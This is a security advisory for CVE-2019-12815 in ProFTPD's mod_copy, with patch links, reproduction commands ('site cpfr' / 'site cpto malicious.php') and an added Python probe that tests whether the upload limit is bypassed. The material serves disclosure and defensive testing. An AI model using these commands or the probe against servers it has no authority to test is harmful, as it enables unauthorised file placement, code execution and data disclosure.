ASA-2019-00464 – ProFTPD: Arbitrary file copy vulnerability in mod_copy allows for remote code execution and information disclosure


Allele Security Alert

ASA-2019-00464

Identifier(s)

ASA-2019-00464, CVE-2019-12815

Title

Arbitrary file copy vulnerability in mod_copy allows for remote code execution and information disclosure

Vendor(s)

The ProFTPD Project

Product(s)

ProFTPD

Affected version(s)

ProFTPD versions up to and including 1.3.6

Fixed version(s)

ProFTPD version 1.3.6 with the following patch applied:

Backport of fix for Bug#4372 to the 1.3.6 branch.
https://github.com/proftpd/proftpd/commit/a73dbfe3b61459e7c2806d5162b12f0957990cb3

ProFTPD versions with the following patch applied:

Bug #4372: Ensure that mod_copy checks for <Limits> for its SITE CPFR/CPTO commands.
https://github.com/proftpd/proftpd/pull/816/commits/71cd49ea82313f78d52a52d0c628a3770dc96608

Proof of concept

Unknown. No standalone proof-of-concept is referenced; the reproduction steps under Technical details are the ones given in the original bug report (Bug 4372).

Description

An arbitrary file copy vulnerability in mod_copy in ProFTPD allows for remote code execution and information disclosure.

Technical details

The mod_copy module's custom SITE CPFR and SITE CPTO commands do not honor <Limit READ> and <Limit WRITE> configurations as expected: the source file of a copy is not checked against <Limit READ>, and the destination is not checked against <Limit WRITE>. A client can therefore copy files it is not allowed to retrieve into a location it can read (information disclosure), and copy files into directories where uploads are denied, which on many setups is enough for code execution.

To reproduce, enable the anonymous-user example that is configured in the Debian default proftpd.conf (shown here with the unrelated directives trimmed):

<Anonymous ~ftp>
  User ftp
  Group nogroup
  UserAlias anonymous ftp
  RequireValidShell off

  MaxClients 10
  DisplayLogin welcome.msg
  DisplayChdir .message

  # Limit WRITE everywhere in the anonymous chroot
  <Directory *>
    <Limit WRITE>
      DenyAll
    </Limit>
  </Directory>

</Anonymous>

Log in as anonymous. You normally cannot upload files (STOR is refused with a 550 reply) because of the DenyAll in <Limit WRITE>. The copy commands are not subject to that limit:

ftp proftptest.domain.org

site cpfr welcome.msg
site cpto malicious.php

You have now created a malicious.php file with the contents of welcome.msg, inside a directory where the server denies uploads. On setups where the anonymous FTP tree is also served by a web server, and the attacker can find a readable file whose contents they influence (an earlier upload, a log, any file that contains attacker-supplied text), the same two commands place that content under an executable name, which is enough for remote code execution. Because <Limit READ> is ignored as well, a file the user may not RETR can be copied to a location they can read and then downloaded.
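As an added example (not code from the advisory, the bug report or the ProFTPD project), the following Python script drives the exchange above with ftplib and decides from the directory listing, not from the reply code, whether SITE CPFR/CPTO bypassed the WRITE limit. A constructed fake server is included so the probe runs offline; the probe file name, the e-mail used as anonymous password and the 550/350/250 reply strings the fake emits are assumptions modelled on ProFTPD behaviour, not values taken from the page.

```python
"""Probe an FTP login for the mod_copy <Limit WRITE> bypass described above.

Added example, not code from the advisory or from the ProFTPD project.
Assumptions (not stated on the page): the account can log in but STOR is
denied by <Limit WRITE>; a readable source file (welcome.msg) exists; the
550 / 350 / 250 replies produced by the fake server below are modelled on
ProFTPD but were not taken from the advisory, so verify them on a real host.
"""
import io
import sys
import ftplib

SRC = "welcome.msg"
DST = "asa-2019-00464-probe.txt"   # harmless name; never probe with an executable extension


def probe_mod_copy(ftp, src=SRC, dst=DST):
    """Drive any ftplib.FTP-like object and report whether SITE CPFR/CPTO
    copied a file into a directory where STOR is denied."""
    report = {"stor_denied": False, "cpfr": None, "cpto": None, "copied": False}

    # Step 1: prove the WRITE limit is in force for ordinary uploads.
    try:
        ftp.storbinary("STOR " + dst, io.BytesIO(b"probe\n"))
    except ftplib.error_perm:
        report["stor_denied"] = True
    else:
        return report            # uploads allowed anyway; nothing to bypass

    # Step 2: the two-command copy from the advisory.
    try:
        report["cpfr"] = ftp.sendcmd("SITE CPFR " + src)
    except ftplib.error_perm as e:
        report["cpfr"] = str(e)  # unreadable source, or mod_copy not loaded
        return report
    try:
        report["cpto"] = ftp.sendcmd("SITE CPTO " + dst)
    except ftplib.error_perm as e:
        report["cpto"] = str(e)  # a patched server refuses here with 550
        return report

    # Step 3: trust the listing, not the reply code. The probe file cannot be
    # removed afterwards by this account: DELE falls under the same <Limit WRITE>.
    report["copied"] = dst in ftp.nlst()
    return report


def is_vulnerable(report):
    return report["stor_denied"] and report["copied"]


class FakeProFTPD:
    """Constructed stand-in for an anonymous ProFTPD login with
    <Limit WRITE> DenyAll, so the probe can be exercised offline."""

    def __init__(self, patched):
        self.patched = patched
        self.files = {SRC: b"Welcome, archive user!\n"}   # constructed content
        self._pending = None

    def storbinary(self, cmd, fp):
        raise ftplib.error_perm("550 %s: Permission denied" % cmd.split(" ", 1)[1])

    def sendcmd(self, cmd):
        verb, arg = cmd.split(" ", 2)[1:]          # "SITE CPFR x" -> CPFR, x
        if verb == "CPFR":
            if arg not in self.files:
                raise ftplib.error_perm("550 %s: No such file or directory" % arg)
            self._pending = arg
            return "350 File or directory exists, ready for destination name"
        if verb == "CPTO":
            if self._pending is None:
                raise ftplib.error_perm("503 Bad sequence of commands")
            if self.patched:                        # fixed build: CPTO honours <Limit WRITE>
                raise ftplib.error_perm("550 %s: Permission denied" % arg)
            self.files[arg] = self.files[self._pending]
            return "250 Copy successful"
        raise ftplib.error_perm("500 %s not understood" % cmd)

    def nlst(self):
        return sorted(self.files)


if __name__ == "__main__":
    if len(sys.argv) == 2:                          # live host: python probe.py ftp.example.org
        with ftplib.FTP(sys.argv[1]) as ftp:
            ftp.login("anonymous", "probe@example.org")
            print(probe_mod_copy(ftp))
    else:
        for patched in (False, True):
            r = probe_mod_copy(FakeProFTPD(patched))
            print("patched=%s vulnerable=%s %s" % (patched, is_vulnerable(r), r))
```

Run it against a host you are authorised to test; the check is deliberately three-step so that a server which merely answers "250" without writing anything, or one where uploads were never denied, is not reported as vulnerable. Until the patch is applied, the usual interim mitigation is not to load mod_copy at all, or to deny its commands with a <Limit SITE_CPFR SITE_CPTO> section; that limit is a mod_copy documentation feature, not something this advisory states, so confirm it against the documentation of the version you run.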

Credits

Tobias Mädel

Reference(s)

Bug 4372 – SITE CPFR/CPTO do not honor <Limit> configurations
http://bugs.proftpd.org/show_bug.cgi?id=4372

Bug #4372: Ensure that mod_copy checks for <Limits> for its SITE CPFR/CPTO commands (pull request #816).
https://github.com/proftpd/proftpd/pull/816

Bug #4372: Ensure that mod_copy checks for <Limits> for its SITE CPFR/CPTO commands.
https://github.com/proftpd/proftpd/pull/816/commits/71cd49ea82313f78d52a52d0c628a3770dc96608

Backport of fix for Bug#4372 to the 1.3.6 branch.
https://github.com/proftpd/proftpd/commit/a73dbfe3b61459e7c2806d5162b12f0957990cb3

CVE-2019-12815
https://security-tracker.debian.org/tracker/CVE-2019-12815

CVE-2019-12815 | SUSE
https://www.suse.com/security/cve/CVE-2019-12815

CVE-2019-12815 in Ubuntu
https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12815.html

CVE-2019-12815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12815

CVE-2019-12815
https://nvd.nist.gov/vuln/detail/CVE-2019-12815

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: July 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.